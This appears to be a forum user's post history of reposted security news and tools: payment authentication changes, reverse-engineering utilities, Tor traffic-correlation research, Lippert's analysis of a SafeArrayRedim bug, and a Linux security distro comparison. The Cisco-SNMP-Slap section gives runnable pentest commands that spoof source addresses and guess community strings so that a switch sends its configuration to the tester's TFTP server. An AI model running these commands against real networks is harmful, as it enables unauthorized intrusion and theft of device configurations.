Everything posted by Nytro

  1. Mastercard and Visa to ERADICATE password authentication

By John Leyden, 14 Nov 2014

Mastercard and Visa are removing the need for users to enter their passwords for identity confirmation as part of a revamp of the existing (oft-criticised) 3-D Secure scheme. The arrival of 3-D Secure 2.0 next year will see the credit card giants moving away from the existing system of secondary static passwords used to authorise online purchases, as applied by Verified by Visa and MasterCard SecureCode, towards a next-generation system based on more secure biometric and token-based prompts. Security experts welcomed the move, which some argue is, if anything, overdue. Initially, authentication codes will be sent to pre-registered mobiles, before the longer-term goal of placing more emphasis on biometrics.

"All of us want a payment experience that is safe as well as simple, not one or the other," said Ajay Bhalla, president of enterprise security solutions at MasterCard, The Guardian reports. "We want to identify people for who they are, not what they remember. We have too many passwords to remember and this creates extra problems for consumers and businesses."

3-D Secure is disliked both by security experts, who argue it's easily circumvented by phishing attacks, and merchants, who say the scheme's only benefit is allowing banks to shift liability in the case of fraudulent payments. The long-standing criticism has been that schemes like Verified by Visa inconvenience users without offering increased security.

Marta Janus, a security researcher at Kaspersky Lab, welcomed the decision by the credit card giants to move away from static passwords. "It's pretty well known that passwords are severely flawed: weak ones are easy to remember and easy to guess; strong ones are hard to guess, but hard to remember," Janus said. "So the move from Mastercard and Visa is definitely an interesting one."

"It's a really good approach and, if implemented properly, the new protocol will not only be way more convenient for users, but also much more secure. One-time passwords are already widely used and considered much safer than traditional 'fixed' passwords, even if it's still possible for cybercriminals to obtain and use them. But, combined with biometric checks, this will certainly make a strong alternative to any existing authentication method," she concluded.

Phil Turner, VP EMEA at enterprise-focused identity management service firm Okta, also welcomed the development as a move towards reducing the number of usernames and passwords consumers are obliged to remember. "Between their work and personal accounts, consumers have a lot of usernames and passwords to remember, each of which has different password requirements and expiration cycles," Turner explained. "Add this to the hassle caused by constant password resets and remembering secret questions and it's clear consumers need a way to make this process easier.

"The move to abolish passwords will no doubt be welcomed by customers. Today we have so many passwords to remember. As a result, most of us suffer from 'password fatigue', where we use obvious or reused passwords often written down on Post-it notes or saved in Excel files on laptops," he added. ®

Source: Mastercard and Visa to ERADICATE password authentication • The Register
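The one-time codes Janus mentions are typically generated with HOTP/TOTP (RFC 4226/6238). As a minimal, hedged Python sketch of how such codes work in general (this is not a description of whatever scheme Visa and MasterCard will actually deploy; the secret below is an arbitrary example):

    import base64
    import hashlib
    import hmac
    import struct
    import time

    def hotp(secret_b32, counter, digits=6):
        # HMAC-SHA1 over the big-endian counter, then dynamic truncation.
        key = base64.b32decode(secret_b32)
        digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
        offset = digest[-1] & 0x0F
        code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
        return str(code % 10 ** digits).zfill(digits)

    def totp(secret_b32, period=30):
        # The counter is simply the number of elapsed 30-second windows.
        return hotp(secret_b32, int(time.time()) // period)

    print(totp("JBSWY3DPEHPK3PXP"))  # example base32 secret

Because the code changes every 30 seconds and is derived from a shared secret, a phished or replayed value goes stale almost immediately, which is the property static 3-D Secure passwords lack.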
  2. IODIDE - The IOS Debugger and Integrated Disassembler Environment

Released as open source by NCC Group Plc - http://www.nccgroup.com/
Developed by Andy Davis, andy dot davis at nccgroup dot com
https://github.com/nccgroup/IODIDE
Released under AGPL; see LICENSE for more information.
Includes the PowerPC disassembler from cxmon by Christian Bauer and Marc Hellwig (The Official cxmon Home Page).

Documentation: https://github.com/nccgroup/IODIDE/wiki

Prerequisites: Python, wxPython, pyserial

Platforms: Tested on Windows 7

Source: https://github.com/nccgroup/IODIDE
  3. IDA Skins

Plugin providing advanced skinning support for the Qt version of IDA Pro, utilizing Qt stylesheets, similar to CSS.

[Screenshot: the enclosed stylesheet.css in combination with the idaConsonance theme]

Binary distribution: download the latest binary version from GitHub.

Installation: place IDASkins.plX into the plugins directory of your IDA installation. The theme files (the skin directory) need to be copied to the root of your IDA installation.

Theming: theming IDA using IDASkins works via Qt stylesheets. For information on the most important IDA-specific UI elements, take a look at the enclosed default stylesheet.css.

Source: https://github.com/athre0z/ida-skins
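For readers who have not used Qt stylesheets before, a small illustrative fragment follows. The selectors below are generic Qt widget classes, not the IDA-specific names from the enclosed stylesheet.css, so treat this as a sketch of the syntax rather than a working theme:

    /* Dark-ish example in Qt stylesheet (QSS) syntax, which closely mirrors CSS. */
    QWidget {
        background-color: #272822;
        color: #f8f8f2;
    }
    QMenu::item:selected {
        /* Sub-controls and pseudo-states work much as in CSS. */
        background-color: #49483e;
    }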
  4. Traffic Analysis Attacks and Defenses in Low Latency Anonymous Communication

Sambuddho Chakravarty

The recent public disclosure of mass surveillance of electronic communication, involving powerful government authorities, has drawn the public's attention to issues regarding Internet privacy. For almost a decade now, there have been several research efforts towards designing and deploying open source, trustworthy and reliable systems that ensure users' anonymity and privacy. These systems operate by hiding the true network identity of communicating parties against eavesdropping adversaries. Tor, an acronym for The Onion Router, is an example of such a system. Such systems relay the traffic of their users through an overlay of nodes that are called Onion Routers and are operated by volunteers distributed across the globe. Such systems have served well as anti-censorship and anti-surveillance tools. However, recent publications have disclosed that powerful government organizations are seeking means to de-anonymize such systems and have deployed distributed monitoring infrastructure to aid their efforts.

Attacks against anonymous communication systems, like Tor, often involve traffic analysis. In such attacks, an adversary, capable of observing network traffic statistics in several different networks, correlates the traffic patterns in these networks and associates otherwise seemingly unrelated network connections. The process can lead an adversary to the source of an anonymous connection. However, due to their design, consisting of globally distributed relays, the users of anonymity networks like Tor can route their traffic via virtually any network, hiding their tracks and true identities from their communication peers and eavesdropping adversaries. De-anonymization of a random anonymous connection is hard, as the adversary is required to correlate traffic patterns in one network link to those in virtually all other networks.

Past research mostly involved reducing the complexity of this process by first reducing the set of relays or network routers to monitor, and then identifying the actual source of anonymous traffic among the network connections that are routed via this reduced set. A study of various research efforts in this field reveals that there have been many more efforts to reduce the set of relays or routers to be searched than to explore methods for actually identifying an anonymous user amidst the network connections using these routers and relays. Few have tried to comprehensively study a complete attack that involves both reducing the set of relays and routers to monitor and identifying the source of an anonymous connection. Although it is believed that systems like Tor are trivially vulnerable to traffic analysis, there are various technical challenges and issues that can become obstacles to accurately identifying the source of an anonymous connection. It is hard to adjudge the vulnerability of anonymous communication systems without adequately exploring the issues involved in identifying the source of anonymous traffic.

Download: http://cryptome.org/2014/11/sambuddho_thesis.pdf
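To make the correlation idea concrete, here is a toy Python sketch (our illustration, not code or methodology from the thesis): an observer bins packet counts per second on two links and checks whether the series line up.

    import numpy as np

    def correlation(a, b):
        # Pearson correlation of two packet-count time series.
        a = (a - a.mean()) / a.std()
        b = (b - b.mean()) / b.std()
        return float(np.mean(a * b))

    rng = np.random.default_rng(0)
    entry = rng.poisson(20, 300).astype(float)  # packets/sec observed near the client
    exit_ = entry + rng.normal(0, 2, 300)       # the same flow, jittered, near the server
    other = rng.poisson(20, 300).astype(float)  # an unrelated flow

    print(correlation(entry, exit_))  # close to 1: the flows match
    print(correlation(entry, other))  # close to 0: the flows are unrelated

Real attacks must contend with sampling, congestion and millions of candidate flows, which is exactly the gap between "trivially vulnerable in principle" and "identifiable in practice" that the thesis examines.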
  5. Cisco-SNMP-Slap

OVERVIEW
========

cisco-snmp-slap utilises IP address spoofing in order to bypass an ACL protecting an SNMP service on a Cisco IOS device. Typically IP spoofing has limited use during real attacks outside DoS: any TCP service cannot complete the initial handshake, and while UDP packets are easier to spoof, the return packet is often sent to the wrong address, which makes it difficult to collect any information returned. However, if an attacker can guess the SNMP rw community string and a valid source address, the attacker can set SNMP MIBs. One of the more obvious uses for this is to have a Cisco SNMP service send its IOS configuration file to another device.

This tool allows you to try one or more community strings against a Cisco device from one or more IP addresses. When specifying IP addresses you can choose to go through a range of source addresses sequentially or randomly. To specify a range of source IP addresses to check, an initial source address and an IP mask are supplied. Any bits set in the IP mask will be used to generate source IP addresses by altering the initial source address. For example, if a source address of `10.0.0.0` is supplied with an IP mask of 0.0.0.255, then the script will explore the addresses from `10.0.0.0` to `10.0.0.255`. The bits set do not have to be sequential like a subnet mask. For example, the mask 0.128.1.255 is valid and will explore the range `10.{0,128}.{0-1}.{0-255}`. (A minimal sketch of this mask expansion follows the post.) When checking a range of IP addresses randomly or sequentially, the tool requires you to enter the path to the root of the tftp directory. The script will check this directory to see if the file has been successfully transferred.

This tool was written to target Cisco layer 3 switches during pentests, though it may have other uses. It works well against these devices because:

1. layer 3 switches rarely have reverse path verification configured, in the author's experience
2. there are no routers or other devices which may be able to detect that IP spoofing is occurring.

Though I hope that users will find other interesting uses for this script and its source code.

USAGE
=====

In this example I will take a simple IOS device with an access list protecting an SNMP service using the community string 'cisco':

    access-list 10 permit 10.100.100.0 0.0.0.255
    snmp-server community cisco rw 10

The IOS device's IP address is `10.0.0.1`. The pentester has the IP address `10.0.0.2` and has started a TFTP server. If the tester knows all of this, they can use the one-shot single mode to grab the device's config file. E.g.:

    ./slap.py single cisco 10.0.0.2 10.100.100.100 10.0.0.1

If the tester doesn't know these details, they could try to guess them. Let's say the tester has done some recon and has figured out that all internal addresses are in the 10.0.0.0/8 range:

    ./slap.py seqmask private 10.0.0.2 10.0.0.0 0.255.255.0 10.0.0.1 /tftproot/

This command will search through all the /24s; the tester hopes they can save some time by assuming a whole subnet will be allowed access rather than just one IP address.

    root@Athena:/home/notroot/cisco-snmp-slap# ./slap.py seqmask cisco 10.0.0.2 10.0.0.5 0.255.255.0 10.0.0.1 /tftproot/
    Cisco SNMP Slap, v0.3
    Darren McDonald, darren.mcdonald@nccgroup.com
    WARNING: No route found for IPv6 destination :: (no default route?)
    Community String: cisco
    TFTP Server IP : 10.0.0.2
    Source IP: 10.0.0.5
    Source Mask: 0.255.255.0
    Destination IP: 10.0.0.1
    TFTP Root Path: /tftproot//cisco-config.txt
    10.0.0.5
    10.0.1.5
    10.0.2.5
    < ... cut for brevity ... >
    10.100.99.255
    10.100.100.0
    10.100.100.1
    10.100.100.2
    10.100.100.3
    10.100.100.4
    10.100.100.5
    10.100.100.6
    Success!

You should notice that the program exits and announces success several IP addresses after it enters the `10.100.100.0/24` range. This is because it is not possible to determine which source address was successful; the tool only determines that one of the requests succeeded once the config file turns up in the tftproot. Given that you've just nabbed the running config, you can now find out the details of the ACL yourself.

Rather than specifying a single community string, you can also give a list which should be used. The mode names are the same except they have a `'_l'` suffix. For example, to repeat the same attack using a list of community strings in list.txt, the following arguments should be used:

    root@Athena:/home/notroot/cisco-snmp-slap# ./slap.py seqmask_l list.txt 10.0.0.2 10.0.0.5 0.255.255.0 10.0.0.1 /tftproot/
    Cisco SNMP Slap, v0.3
    Darren McDonald, darren.mcdonald@nccgroup.com
    WARNING: No route found for IPv6 destination :: (no default route?)
    Community File: list.txt
    TFTP Server IP : 10.0.0.2
    Source IP: 10.0.0.5
    Source Mask: 0.255.255.0
    Destination IP: 10.0.0.1
    TFTP Root Path: /tftproot//cisco-config.txt
    community strings loaded: ['private\n', 'cisco\n', 'public\n']
    10.0.0.5 / private
    10.0.0.5 / cisco
    10.0.0.5 / public
    10.0.1.5 / private
    10.0.1.5 / cisco
    10.0.1.5 / public
    10.0.2.5 / private
    10.0.2.5 / cisco
    10.0.2.5 / public
    10.0.3.5 / private
    10.0.3.5 / cisco
    10.0.3.5 / public

Now each IP address is checked with each community string in list.txt.

SUPPORT
=======

As programming languages go, Python is a simple language, easy to read and write, and I encourage you to attempt to debug and correct any issues you find and send me your changes so I can share them with other users on the NCC GitHub. But if you need assistance you can contact me at darren.mcdonald@nccgroup.com. I'll do my best to help you, but you should be aware that I am not a full-time developer (which should be obvious from my code!) and may not immediately have time to get to your query.

VERSIONS
========

* 0.1 Initial version
* 0.2 Added random and sequential modes and source address masks
* 0.3 Added community string file list feature; first public version

Source: https://github.com/nccgroup/Cisco-SNMP-Slap
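As referenced above, here is a minimal Python sketch of how the mask-based source-address generation can work. This is an illustrative reimplementation, not code taken from slap.py:

    import socket
    import struct

    def expand_sources(base_ip, ip_mask):
        # Yield every address obtained by toggling the bits set in ip_mask,
        # while keeping the unmasked bits of the base address fixed.
        base = struct.unpack(">I", socket.inet_aton(base_ip))[0]
        mask = struct.unpack(">I", socket.inet_aton(ip_mask))[0]
        bits = [1 << i for i in range(32) if mask & (1 << i)]
        for n in range(1 << len(bits)):
            addr = base & ~mask & 0xFFFFFFFF  # clear the masked bits first
            for j, bit in enumerate(bits):
                if n & (1 << j):
                    addr |= bit
            yield socket.inet_ntoa(struct.pack(">I", addr))

    # expand_sources("10.0.0.5", "0.255.255.0") walks 10.0.0.5, 10.0.1.5, ...
    # matching the sequential output shown in the usage example above.

Note how the mask need not be contiguous: any set bit simply becomes one more binary digit of the counter that is scattered over the address.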
  6. Eric Lippert Dissects CVE-2014-6332, a 19-year-old Microsoft bug

Posted by Eric, Nov 14, 2014

Today's Coverity Security Research Lab blog post is from guest blogger Eric Lippert.

[UPDATE 1: The MISSING_RESTORE checker regrettably doesn't find the defect in the code I've posted here. Its heuristics for avoiding false positives cause it to suppress reporting, ironically enough. We're working on tweaking that heuristic for an upcoming release.]

It was with a bizarre combination of nostalgia and horror that I read this morning about a 19-year-old, rather severe security hole in Windows. Nostalgia because every bit of the exploited code is very familiar to me: working on the portion of the VBScript engine used to exploit the defect was one of my first jobs at Microsoft back in the mid-1990s. And horror because this is really a quite serious defect that has been present probably since Windows 3.1 [UPDATE 2: heard that Windows 3.1 is in fact not affected, so you IE 2-5 users are safe], and definitely exploitable since Windows 95. Fortunately we have no evidence that this exploit has actually been used to do harm to users, and Microsoft has released a patch. (Part of my horror was the fear that maybe this one was my bad, but it looks like the actual bug predates my time at Microsoft. Whew!)

The thirty-thousand-foot view is the old familiar story. An attacker who wishes to run arbitrary code on a user's machine lures the user into browsing to a web page that contains some hostile script -- VBScript, in this case. The hostile script is running inside a "sandbox" which is supposed to ensure that it only does "safe" operations, but the script attempts to force a particular buggy code path through the underlying operating system code. If it does so successfully, it produces a corrupt data structure in memory which can then be further manipulated by the script. By cleverly controlling the contents of the corrupted data structure, the hostile script can read or write memory and execute code of its choice.

Today I want to expand a bit on Robert Freeman's writeup, linked above, to describe the underlying bug in more detail, the pattern that likely produced it, better ways to write the code, and whether static analysis tools could find this bug. I'm not going to delve into the specifics of how this initially-harmless-looking bug can be exploited by attackers.

What's so safe about a SAFEARRAY?

Many of the data structures familiar to COM programmers today, like VARIANT, BSTR and SAFEARRAY, were created for "OLE Automation"; old-timers will of course remember that OLE stood for "object linking and embedding", the "paste this Excel spreadsheet into that Word document" feature. OLE Automation was the engine that enabled Word and Excel objects to be accessed programmatically by Visual Basic. (In fact the B in BSTR stands for "Basic".) Naturally, Visual Basic uses these data structures for its representations of strings and arrays.
The data structure which particularly concerns us today is SAFEARRAY:

    typedef struct tagSAFEARRAY {
        USHORT cDims;                // number of dimensions
        USHORT fFeatures;            // type of elements
        ULONG cbElements;            // byte size per element
        ULONG cLocks;                // lock count
        PVOID pvData;                // data buffer
        SAFEARRAYBOUND rgsabound[1]; // bounds, one per dimension
    } SAFEARRAY;

    typedef struct tagSAFEARRAYBOUND {
        ULONG cElements;             // number of indices in this dimension
        LONG lLbound;                // lowest valid index
    } SAFEARRAYBOUND;

SAFEARRAYs are so-called because unlike an array in C or C++, a SAFEARRAY inherently knows the dimensionality of the array, the type of the data in the array, the number of bytes in the buffer, and finally, the bounds on each dimension. How multi-dimensional arrays and arrays of unusual types are handled is irrelevant to our discussion today, so let's assume that the array involved in the attack is a single-dimensional array of VARIANT.

The operating system method which contained the bug was SafeArrayRedim, which takes an existing array and a new set of bounds for the least significant dimension -- though again, for our purposes, we'll assume that there is only one dimension. The function header is:

    HRESULT SafeArrayRedim(
        SAFEARRAY *psa,
        SAFEARRAYBOUND *psaboundNew
    )

Now, we do not have the source code of this method, but based on the description of the exploit we can guess that it looks something like the code below that I made up just now. Bits of code that are not particularly germane to the defect I will omit, and I'll assume that somehow the standard OLE memory allocator has been obtained. Of course there are many cases that must be considered here -- such as "what if the lock count is non-zero?" -- that I am going to ignore in pursuit of understanding the relevant bug today. As you're reading the code, see if you can spot the defect:

    {
        // Omitted: verify that the arguments are valid; produce
        // E_INVALIDARG or other error if they are not.

        PVOID pResourcesToCleanUp = NULL; // We'll need this later.
        HRESULT hr = S_OK;

        // How many bytes do we need in the buffer for the original array?
        // And for the new array?
        LONG cbOriginalSize = SomehowComputeTotalSizeOfOriginalArray(psa);
        LONG cbNewSize = SomehowComputeTotalSizeOfNewArray(psa, psaboundNew);
        LONG cbDifference = cbNewSize - cbOriginalSize;
        if (cbDifference == 0)
        {
            goto DONE;
        }
        SAFEARRAYBOUND originalBound = psa->rgsabound[0];
        psa->rgsabound[0] = *psaboundNew;
        // continues below ...

Things are looking pretty reasonable so far. Now we get to the tricky bit.

Why is it so hard to shrink an array?

If the array is being made smaller, the variants that are going to be dropped on the floor might contain resources that need to be cleaned up. For example, if we have an array of 1000 variants containing strings, and we reallocate that to only 300, those 700 strings need to be freed. Or, if instead of strings they are COM objects, they need to have their reference counts decreased.

But now we are faced with a serious problem. We cannot clean up the resources after the reallocation. If the reallocation succeeds then we no longer have any legal way to access the memory that we need to scan for resources to free; that memory could be shredded, or worse, it could be reallocated to another block on another thread and filled in with anything. You simply cannot touch memory after you've freed it. But we cannot clean up resources before the reallocation either, because what if the reallocation fails? It is rare for a reallocation that shrinks a block to fail.
While the documentation for IMalloc::Realloc doesn't call out that it can fail when shrinking (doc bug?), it doesn't rule it out either. In that case we have to return the original array, untouched, and deallocating 70% of the strings in the array is definitely not "untouched". The solution to this impasse is that we have to allocate a new block and copy the resources into that new block before the reallocation. After a successful reallocation we can clean up the resources; after a failed reallocation we of course do not.

        // ... continued from above
        if (cbDifference < 0)
        {
            pResourcesToCleanUp = pmalloc->Alloc(-cbDifference);
            if (pResourcesToCleanUp == NULL)
            {
                hr = E_OUTOFMEMORY;
                goto DONE;
            }
            // Omitted: memcpy the resources to pResourcesToCleanUp
        }
        PVOID pNewData = pmalloc->Realloc(psa->pvData, cbNewSize);
        if (pNewData == NULL)
        {
            psa->rgsabound[0] = originalBound;
            hr = E_OUTOFMEMORY;
            goto DONE;
        }
        psa->pvData = pNewData;
        if (cbDifference < 0)
        {
            // Omitted: clean up the resources in pResourcesToCleanUp
        }
        else
        {
            // Omitted: initialize the new array slots to zero
        }
        hr = S_OK; // Success!
    DONE:
        // Don't forget to free that extra block.
        if (pResourcesToCleanUp != NULL)
            pmalloc->Free(pResourcesToCleanUp);
        return hr;
    }

Did you spot the defect?

Part of the contract of this method is that when this method returns a failure code, the original array is unchanged. The contract is violated in the code path where the array is being shrunk and the allocation of pResourcesToCleanUp fails. In that case we return a failure code, but never restore the state of the bounds which were mutated earlier to the smaller values. Compare this code path to the code path where the reallocation fails, and you'll see that the restoration line is missing.

In a world where there is no hostile code running on your machine, this is not a serious bug. What's the worst that can happen? In the incredibly rare case where you are shrinking an array by an amount bigger than the memory you have available in the process, you end up with a SAFEARRAY that has the wrong bounds in a program that just produced a reallocation error anyways, and any resources that were in that memory are never freed. Not a big deal. This is the world in which OLE Automation was written: a world where people did not accidentally download hostile code off the Internet and run it automatically.

But in our world this bug is a serious problem! An attacker can make what used to be an incredibly rare situation -- running out of virtual address space at exactly the wrong time -- quite common by carefully controlling how much memory is allocated at any one time by the script. An attacker can cause the script engine to ignore the reallocation error and keep on processing the now-internally-inconsistent array. And once we have an inconsistent data structure in memory, the attacker can use other sophisticated techniques to take advantage of this corrupt data structure to read and write memory that they have no business reading and writing. Like I said before, I'm not going to go into the exact details of the further exploits that take advantage of this bug; today I'm interested in the bug itself. See the linked article for some thoughts on the exploit.

How can we avoid this defect? How can we detect it?

It is surprisingly easy to write these sorts of bugs in COM code. What can you do to avoid this problem? I wrote who knows how many thousands of lines of COM code in my early days at Microsoft, and I avoided these problems by application of a strict discipline.
Among my many rules for myself were:

* Every method has exactly one exit point.
* Every local variable is initialized to a sensible value or NULL.
* Every non-NULL local variable is cleaned up at the exit point. Conversely, if the resource is cleaned up early on a path, or if its ownership is ever transferred elsewhere, then the local is set back to NULL.
* Methods which modify memory locations owned by their callers do so only at the exit point, and only when the method is about to return a success code.

The code which I've presented here today -- which I want to emphasize again I made up myself just now to illustrate what the original bug probably looks like -- follows some of these best practices, but not all of them. There is one exit point. Every local is initialized. One of the resources -- the pResourcesToCleanUp block -- is cleaned up correctly at the exit point. But the last rule is violated: memory owned by the caller is modified early, rather than immediately before returning success. The requirement that the developer always remember to re-mutate the caller's data in the event of an error is a bug waiting to happen, and in this case, it did happen. Clearly the code I presented today does not follow my best practices for writing good COM methods.

Is there a more general pattern to this defect? A closely related defect pattern that I see quite often in C, C++, C# and Java is:

    someLocal = someExternal;
    someExternal = differentValue;
    DoSomethingThatDependsOnTheExternal();
    //... lots of code ...
    if (someError)
        return;
    //... lots of code ...
    someExternal = someLocal;

And of course the variation where the restoration of the external value is skipped because of an unhandled exception is common in C++, C# and Java. (A short illustration of this pattern follows the post.)

Could a static analyzer help find defects like this? Certainly; Coverity's MISSING_RESTORE analyzer finds defects of the form I've just described. (Though I have not yet had a chance to run the code I presented today through it to see what happens.) There are a lot of challenges in designing analyzers to find the defect I presented today; one is determining that in this code the missing restoration is a defect on the error path but correct on the success path. This real-world defect is a good inspiration for some avenues for further research in this area; have you seen similar defects that follow this pattern in real-world code, in any language? I'd love to see your examples; please leave a comment if you have one.

Source: Coverity Security Research Lab
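As a hedged illustration of the pattern Lippert describes (our sketch in Python for brevity; the names are invented and this is not the real SafeArrayRedim), note how only one of the two error paths restores the caller-visible bounds:

    class FakeSafeArray:
        """Toy stand-in for a SAFEARRAY: `bounds` is caller-visible state."""
        def __init__(self, bounds, data):
            self.bounds = bounds
            self.data = data

    def redim(arr, new_bounds, allocate):
        original = arr.bounds
        arr.bounds = new_bounds            # caller-owned state mutated early
        if new_bounds < original:          # shrinking: stage resources first
            try:
                staging = allocate(original - new_bounds)
            except MemoryError:
                return "E_OUTOFMEMORY"     # BUG: arr.bounds is not restored
        try:
            arr.data = allocate(new_bounds)
        except MemoryError:
            arr.bounds = original          # this error path restores correctly
            return "E_OUTOFMEMORY"
        # staging (the copied resources) would be cleaned up here on success.
        return "S_OK"

    # e.g. redim(FakeSafeArray(1000, bytearray(1000)), 300, allocate=bytearray)

Following Lippert's last rule, mutating arr.bounds only immediately before returning "S_OK", removes the bug entirely, because there is then nothing left to restore on any error path.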
  7. Linux Security Distros Compared: Tails vs. Kali vs. Qubes

Thorin Klosowski

If you're interested in security, you've probably already heard of security-focused Linux distros like Tails, Kali, and Qubes. They're really useful for browsing anonymously, penetration testing, and tightening down your system so it's secure from would-be hackers. Here are the strengths and weaknesses of all three.

It seems like every other day we hear about another hack, browser exploit, or nasty bit of malware. If you do a lot of your browsing on public Wi-Fi networks, you're a lot more susceptible to these types of hacks. A security-focused distribution of Linux can help. For most of us, the use cases here are pretty simple. If you need to use a public Wi-Fi network at a coffee shop or the library, then one of these distributions can hide your traffic from someone trying to peek in. Likewise, if you're worried about someone tracking down your location, whether it's a creepy stalker or something even worse, randomizing and anonymizing your traffic keeps you safe. Obviously you don't need this all the time, but if you're checking bank statements, uploading documents onto a work server, or even just doing some shopping, it's better to be safe than sorry.

All of these distributions can run in a virtual machine or from a Live CD/USB. That means you can carry them around in your pocket and boot into them when you need to without causing yourself too much trouble.

Tails Provides Security Through Anonymity

Tails is a live operating system built on Debian that uses Tor for all its internet traffic. Its main goal is to give you security through anonymity. With it, you can browse the web anonymously through encrypted connections. Tails protects you in a number of ways. First, since all your traffic is routed through Tor, it's incredibly difficult to track your physical location or see which sites you visit. Tails doesn't use a computer's hard disk, so nothing you do is saved to the computer you're running it on. Instead, everything you're working on is stored in RAM and erased when you shut down. This means any sensitive documents you're working on are never stored permanently. Because of that, Tails is a really good operating system to use when you're on a public computer or network.

Tails is also packed with a bunch of basic cryptographic tools. If you're running Tails off a USB drive, it's encrypted with LUKS. All your internet traffic is encrypted with HTTPS Everywhere, your IM conversations are encrypted with OTR, and your emails and documents are encrypted with OpenPGP.

The crux of Tails is anonymity. While it has cryptographic tools in place, its main purpose is to anonymize everything you're doing online. This is great for most people, but it doesn't give you the freedom to do stupid things. If you log into your Facebook account under your real name, it's still going to be obvious who you are, and remaining anonymous in an online community is a lot harder than it seems.

Pros: Routes all your traffic through Tor, comes with a ton of open-source software, has a "Windows Camouflage" mode to make it look more like Windows 8.

Cons: Can't save files locally, slow, loading web sites through Tor takes forever.

Who It's Best For: Tails is best suited for on-the-go security. If you find yourself at coffee shops or public libraries using the internet a lot, then Tails is perfect for you.
Anonymity is the game, so if you're sick of everyone tracking what you're doing, Tails is great; but keep in mind that it's also pretty useless unless you use pseudonyms everywhere online.

Kali Is All About Offensive Security

Where Tails is about anonymity, Kali is mostly geared toward security testing. Kali is built on Debian and maintained by Offensive Security Ltd. You can run Kali off a Live CD, USB drive, or in a virtual machine. Kali's main focus is on pen testing, which means it's great for poking around for security holes in your own network, but isn't built for general use. That said, it does have a few basic packages, including Iceweasel for browsing the web and everything you need to run a secure server with SSH, FTP, and more. Likewise, Kali is packed with tools to hide your location and set up VPNs, so it's perfectly capable of keeping you anonymous.

Kali has around 300 tools for testing the security of a network, so it's hard to really keep track of what's included, but the most popular thing to do with Kali is crack a Wi-Fi password. Kali's motto adheres to "the best defense is a good offense", so it's meant to help you test the security of your network as a whole, rather than just making you secure on one machine. Still, if you use Kali Linux, it won't leave anything behind on the system you're running it on, so it's pretty secure itself. Besides a Live CD, Kali can also run on a ton of ARM devices, including the Raspberry Pi, BeagleBone, several Chromebooks, and even the Galaxy Note 10.1.

Pros: Everything you need to test a network is included in the distribution, it's relatively easy to use, and it can be run both from a Live CD and in a virtual machine.

Cons: Doesn't include too many tools for everyday use, doesn't include the cryptographic tools that Tails does.

Who It's Best For: Kali is best suited for IT administrators and hobbyists looking to test their network for security holes. While it's secure itself, it doesn't have the basic daily-use stuff most of us need from an operating system.

Qubes Offers Security Through Isolation

Qubes is a desktop environment based on Fedora that's all about security through isolation. Qubes assumes that there can't be a truly secure operating system, so instead it runs everything inside of virtual machines. This ensures that if you are the victim of a malicious attack, it doesn't spread to the operating system as a whole.

With Qubes, you create virtual machines for each of your environments. For example, you could create a "Work" virtual machine that includes Firefox and Thunderbird, a "Shopping" virtual machine that includes just Firefox, and then whatever else you need. This way, when you're messing around in the "Shopping" virtual machine, it's isolated from your "Work" virtual machine in case something goes wrong. You can create virtual machines of Windows and Linux. You can also create disposable virtual machines for one-time actions. Whatever happens within these virtual machines is isolated, but it's not secured: if you run a buggy web browser, Qubes doesn't do much to stop the exploit.

The architecture itself is set up to protect you as well. Your network connection automatically gets its own virtual machine and you can set up a proxy server for more security. Likewise, storage gets its own virtual machine as well, and everything on your hard drive is automatically encrypted. The major downfall with Qubes is the fact that you need to do everything manually.
Setting up virtual machines secures your system as a whole, but you have to be proactive in actually using them. If you want your data to remain secure, you have to separate it from everything else.

Pros: The isolation technique ensures that if you do download malware, your entire system isn't infected. Qubes works on a wide variety of hardware, and it's easy to securely share clipboard data between VMs.

Cons: Qubes requires that you take action to create the VMs, so none of the security measures are foolproof. It's still totally susceptible to malware or other attacks too, but there's less of a chance that it'll infect your whole system.

Who It's Best For: Qubes is best for proactive types who don't mind doing a bit of work to set up a secure environment. If you're working on something you don't want in other people's hands, writing out a bunch of personal information, or you're just handing over your computer to a friend who loves clicking on malicious-looking sites, then a virtual machine's an easy way to keep things secure. Where something like Tails does everything for you out of the box, Qubes takes a bit of time to set up and get working. Qubes' user manual is pretty giant, so you have to be willing to spend some time learning it.

The Rest: Ubuntu Privacy Remix, JonDo, and IprediaOS

Tails, Kali, and Qubes certainly aren't the only security-focused operating systems around. Let's take a quick look at a few other popular options.

Ubuntu Privacy Remix: As the name suggests, Ubuntu Privacy Remix is a privacy-focused distribution built on Ubuntu. It's offline-only, so it's basically impossible for anyone to hack into it. The operating system is read-only so it can't be changed, and you can only store data on encrypted removable media. It has a few other tricks up its sleeve, including a system to block third parties from activating your network connection, and TrueCrypt encryption.

JonDo: JonDo is a Live DVD based on Debian that contains proxy clients, a preconfigured browser for anonymous surfing, and a number of basic security tools. It's similar to Tails, but is a bit more simplified and unfamiliar.

IprediaOS: Like Tails, IprediaOS is all about anonymity. Instead of routing traffic through Tor, IprediaOS routes through I2P.

Of course, none of these operating systems is particularly ideal for day-to-day use. When you're anonymizing your traffic, hiding it away, or isolating it from the rest of your operating system, you tend to take away system resources and slow things down. Likewise, the bandwidth costs mean most of your web browsing is pretty terrible. All that said, these systems are great when you're on public Wi-Fi, using a public computer, or when you just need to use a friend's computer that you don't want to leave your private data on. They're all secure enough to protect most of us with our general behavior, so pick whichever one is best suited for your particular needs.

Source: Linux Security Distros Compared: Tails vs. Kali vs. Qubes
  8. Traffic correlation using netflows

Posted November 14th, 2014 by arma

People are starting to ask us about a recent tech report from Sambuddho's group about how an attacker with access to many routers around the Internet could gather the netflow logs from these routers and match up Tor flows. It's great to see more research on traffic correlation attacks, especially on attacks that don't need to see the whole flow on each side. But it's also important to realize that traffic correlation attacks are not a new area. This blog post aims to give you some background to get you up to speed on the topic.

First, you should read the first few paragraphs of the "One cell is enough to break Tor's anonymity" analysis:

First, remember the basics of how Tor provides anonymity. Tor clients route their traffic over several (usually three) relays, with the goal that no single relay gets to learn both where the user is (call her Alice) and what site she's reaching (call it Bob). The Tor design doesn't try to protect against an attacker who can see or measure both traffic going into the Tor network and also traffic coming out of the Tor network. That's because if you can see both flows, some simple statistics let you decide whether they match up. Because we aim to let people browse the web, we can't afford the extra overhead and hours of additional delay that are used in high-latency mix networks like Mixmaster or Mixminion to slow this attack. That's why Tor's security is all about trying to decrease the chances that an adversary will end up in the right positions to see the traffic flows.

